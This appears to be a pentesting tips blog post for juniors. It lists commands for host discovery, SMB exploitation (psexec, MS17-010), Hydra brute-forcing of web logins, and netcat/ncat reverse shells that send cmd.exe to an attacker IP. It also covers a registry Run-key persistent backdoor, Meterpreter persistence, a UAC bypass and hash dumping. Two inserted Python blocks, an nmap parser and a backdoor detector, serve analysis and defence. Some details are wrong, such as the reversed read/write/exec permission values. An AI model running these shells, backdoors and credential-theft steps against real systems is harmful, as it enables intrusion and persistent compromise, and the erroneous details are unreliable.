Back to Basics -> Junior pentester tips and methodology
Recently I was discussing tradecraft with a very experienced government cyber analyst. He made a valid point in stating that “experts and pros focus on the basics and do the basics well”. I couldn't agree more, and it got me thinking that perhaps I should share some of my top basic tips to master when starting out in the penetration testing world as a junior.
Setting Up
cat /etc/resolv.conf
echo "nameserver X.X.X.X" > /etc/resolv.conf
service network-manager status|start|stop
route -n
route add default gw X.X.X.X eth0
Oneliners for internal host discovery.
- arp-scan $ipaddress | grep 192.168.X | cut -f1 | grep -v ipv4 | grep -v MAC > hosts.txt
- cat *.nmap | grep "open" | grep -v "filtered" | cut -d "/" -f1 | sort -u | xargs
- fping -a -g [ip range]
The first command explained step by step:
- arp-scan $ipaddress | grep 192.168.X | cut -f1 = run arp-scan on the selected IP range, then from the results show only the lines whose IP address matches the first three octets, keeping just the address column
I particularly like the second one-liner as it gives quick results for which port numbers (“services”) are open across the network range. This can be really useful in certification exams like TIGER SCHEME QSTM and CREST CRT, as you will get asked which port numbers are open on a given IP range.
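As an added example (not from the original post), here is a small Python parser that does what the cat *.nmap one-liner does, but per host and with exact state matching, so "open|filtered" UDP ports are not counted as open; the scan output below is a constructed sample, not a real scan.

```python
import re
from collections import defaultdict

# Constructed sample of nmap "normal" output (the .nmap file written by -oN),
# covering two hosts, an open|filtered UDP port and a filtered TCP port.
SAMPLE_NMAP = """\
Nmap scan report for 192.168.10.5
Host is up (0.0021s latency).
Not shown: 996 closed ports
PORT     STATE         SERVICE
22/tcp   open          ssh
80/tcp   open          http
445/tcp  open          microsoft-ds
161/udp  open|filtered snmp

Nmap scan report for 192.168.10.7
Host is up (0.0034s latency).
PORT     STATE    SERVICE
445/tcp  open     microsoft-ds
3389/tcp filtered ms-wbt-server
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_open_ports(text):
    """Map each scanned host to its [(port, proto, service)] entries whose state is exactly 'open'."""
    hosts = defaultdict(list)
    host = None
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host = m.group(1)          # every port line below belongs to this host
            continue
        m = PORT_RE.match(line)
        if m and host:
            port, proto, state, service = m.groups()
            if state == "open":        # drops 'filtered' and 'open|filtered', like grep -v filtered
                hosts[host].append((int(port), proto, service))
    return dict(hosts)


def unique_open_ports(text):
    """The one-liner's answer (unique open port numbers), sorted numerically rather than as strings."""
    return sorted({p for entries in parse_open_ports(text).values() for p, _, _ in entries})


def hosts_with_port(text, port):
    """Which hosts expose a given port, the follow-up question an exam or report usually asks."""
    return sorted(h for h, entries in parse_open_ports(text).items()
                  if any(p == port for p, _, _ in entries))
```

Note that sort -u in the shell version sorts as strings (22, 3389, 445, 80), whereas this sorts numerically.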
Gather a Hostname
nslookup $Ip (nmap $ip will also give the hostname)
msfdb
>db_nmap -vv -iL 10hosts.txt 192hosts.txt 172hosts.txt
>db_nmap -vv -sU -iL 10hosts.txt
>db_status
>msfdb init
Nessus
/sbin/service nessusd start|stop
Localhost:8334
SMB — Server Message Block
SMB has for a long time been in the spotlight of notorious vulnerabilities. To really master internal pentesting you need to spend a while reading up on SMB and become comfortable exploiting this service. Here is an overview:
I think SMB exploitation can get confusing as there are so many different tools, so let's look at a selection and keep it simple.
>nmap --script smb-vuln* -p445 192.168.83.0/24
>nmap -A -p 445 $Ip
>For Linux, to list shares: nmblookup -A $Ip
>For Windows (null session): net use \\$IP\[sharename]$ "" /u:""
>A manual method using the built-in Python script "samrdump.py" to enumerate the password policy and users
You should be aware of the most common SMB vulns:
MS17-010 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 which affects Vista / Server 2008 / Win 7 / Server 2008 R2 / Win 8.1 / Server 2012 (R2) / Win 10 / Server 2016
For older Windows machines like Windows 2000 / XP / Windows 2003: MS08-067 -> https://docs.microsoft.com/en-us/security-updates/securitybulletins/2008/ms08-067
Understand pass-the-hash (PTH) attacks and SMB relay attacks:
https://www.notsosecure.com/pwning-with-responder-a-pentesters-guide/
msfconsole:
use auxiliary/scanner/smb/smb_login
set SMBPass [hash]
set SMBUser [user]
also
use exploit/windows/smb/psexec
also
use exploit/windows/smb/ms17_010_psexec
Web Applications:
VirusTotal is great for finding subdomains: https://www.virustotal.com/gui/home/search
Along with DNS searching, another good method is checking the site's certificates for subdomains at crt.sh
- gobuster dir -u http://10.10.10.140 -w (wordlist) -t 50
- sublist3r -v -d [domain] -b (brute force, using /usr/share/sublist3r/subbrute/names.txt)
- amass
- apt install snapd -> service snapd start -> snap install amass
- snap run amass -d [domain]
Using Hydra for HTTP authentication bypass
In the browser's developer tools, select the Network tab and then attempt to log in (this will fail). After the login fails, click on the POST request and then click on “Edit and Resend.”
Look for the hostname/IP, login page, request body, and the error message.
Command Build
With all the information that we have collected, now let's build the hydra command.
Change <Login page>: this value has to start with a forward slash “/”.
Change <Request body> to the format from the page. We do need to modify the username and password: replace the failed username with ^USER^ and the failed password with ^PASS^. This change allows hydra to substitute the values.
Change <Error Message> to the failed login error message.
Change <IP Address> to either an IP address or hostname.
Change <User> to either a username or a username list.
Change <Password> to either a password or a password list.
Layout of the command: hydra -L <USER> -P <Password> <IP Address> http-post-form "<Login Page>:<Request Body>:<Error Message>"
dirb tips
- dirb [domain] -p [proxy] indicates using a proxy, so you can pass your results from dirb to Burp (e.g. dirb http://somesite.com -p 127.0.0.1:8080)
- dirb -c [cookie] uses a cookie to authenticate
- -z 1000 adds a 1000 ms delay, limiting requests to one per second in case of a WAF
- -X [extensions] appends extensions, e.g. -X .php,.bak
Mysql:
mysql -u [username] -p[pass] -h [$Ip]   (no space between -p and the password, otherwise it is taken as the database name)
Netcat and Ncat:
nc -lvp 8888 > received.txt (listener that writes whatever it receives to a file)
nc -lvp 8888 -e [cmd to execute]
nc -lvp 8888 -e /bin/bash (listener)
nc -v [$ip of victim] 8888
id / whoami
ncat
Very similar to netcat (nc). Very useful if you can get ncat.exe onto the Windows victim machine.
attacker> ncat -l -p 5555 -v
victim> ncat -e cmd.exe [attacker ip] 5555
Creating a persistent backdoor
With ncat we need to add the command as a key in the system registry. Firstly, on the attacker machine you will need to set up your listener.
attacker:
>ncat -l -p 5544 -v
Victim:
Now we add the ncat command to the registry:
Start > Run > regedit > Computer > HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Right-click to add a string value for the ncat binary: select New > String Value, then double-click the new value and enter the command you want to run, e.g. "C:\Windows\System32\ncat.exe 192.168.X.X 5544 -e cmd.exe"
You can now restart the victim machine; once it restarts you will get a shell on the attacker's listener.
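From the defender's side, that Run key value is exactly what an incident responder or a post-engagement clean-up checks for. The following added Python (not from the original post) parses reg query style output for the Run key, which here is a constructed sample, and flags values that look like the ncat backdoor above: a netcat-family binary, a -e shell handoff, a hard-coded remote IP, or a launch from a user-writable directory.

```python
import re

# Constructed sample in the layout of `reg query HKLM\...\CurrentVersion\Run` output;
# the value names, paths and addresses are invented for illustration.
SAMPLE_RUN_KEY = r"""
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    Updater           REG_SZ           C:\Windows\System32\ncat.exe 192.168.50.20 5544 -e cmd.exe
    OneDrive          REG_SZ           "C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    svchosts          REG_SZ           C:\Users\Public\nc.exe -e powershell.exe 10.0.0.9 4444
"""

ENTRY_RE = re.compile(r"^\s+(\S+)\s+(REG_\w+)\s+(.*\S)\s*$")
SUSPECT_BINARIES = {"ncat.exe", "nc.exe", "netcat.exe"}
IP_RE = re.compile(r"\b\d{1,3}(?:\.\d{1,3}){3}\b")
EXEC_FLAG_RE = re.compile(r"(?:^|\s)-e\s+\S*(?:cmd|powershell|bash|sh)(?:\.exe)?\b", re.I)
WRITABLE_DIRS = ("c:\\users\\public\\", "\\temp\\", "\\downloads\\")

def parse_run_entries(text):
    """Return [(value_name, reg_type, command)] for each value line of the export."""
    return [m.groups() for m in map(ENTRY_RE.match, text.splitlines()) if m]

def executable_of(cmd):
    """First token of the command, honouring a double-quoted path with spaces."""
    cmd = cmd.strip()
    return cmd[1:cmd.find('"', 1)] if cmd.startswith('"') else cmd.split()[0]

def assess_run_entries(text):
    """Map each suspicious autorun value name to the reasons it was flagged."""
    findings = {}
    for name, _, cmd in parse_run_entries(text):
        exe = executable_of(cmd).lower()
        reasons = []
        if exe.rsplit("\\", 1)[-1] in SUSPECT_BINARIES:
            reasons.append("netcat-family binary")
        if EXEC_FLAG_RE.search(cmd):
            reasons.append("-e hands a shell to whoever connects")
        if IP_RE.search(cmd):
            reasons.append("hard-coded remote IP address")
        if any(d in exe for d in WRITABLE_DIRS):
            reasons.append("runs from a user-writable directory")
        if reasons:
            findings[name] = reasons
    return findings
```

Real triage would also cover the HKCU Run key, RunOnce and scheduled tasks, which this sample does not parse.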
Other methods of persistence
Meterpreter:
use exploit/windows/local/s4u_persistence
set SESSION 2
set TRIGGER logon
set payload windows/meterpreter/reverse_tcp
set LHOST / LPORT
exploit
To test it, set up a listener:
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LPORT
run
Now reboot the victim and wait for the shell :P
More on Meterpreter
“hashdump” can only be run as SYSTEM, since it reads the SAM, therefore attempt to priv esc by typing “getsystem”. If it fails it may be due to UAC; you can check whether UAC is enabled with
>run post/windows/gather/win_privs
To bypass UAC:
>background
>search uac
>use exploit/windows/local/bypassuac
>set SESSION X
>exploit
After you have elevated privs by bypassing UAC, here are some useful commands:
- getpid (identify your current PID)
- ps -U SYSTEM (choose a PID from the list)
- migrate [PID]
- getpid (confirm you are now in the new process)
VNC (ports 5800 | 5900)
You can use Firefox to connect via VNC
use auxiliary/scanner/vnc/vnc_login
Permissions
user | group | other (1 | 2 | 4 read | write | exe )
Ldap
ldapsearch -h [ip] -x -b "DC=[name],DC=local" | grep pwd
Kerberos
I think it's fair to say that if you can master all of the above you will be in a fairly good place as a junior pentester. Remember: keep it simple and keep enumerating. Thanks for reading. CodedHound!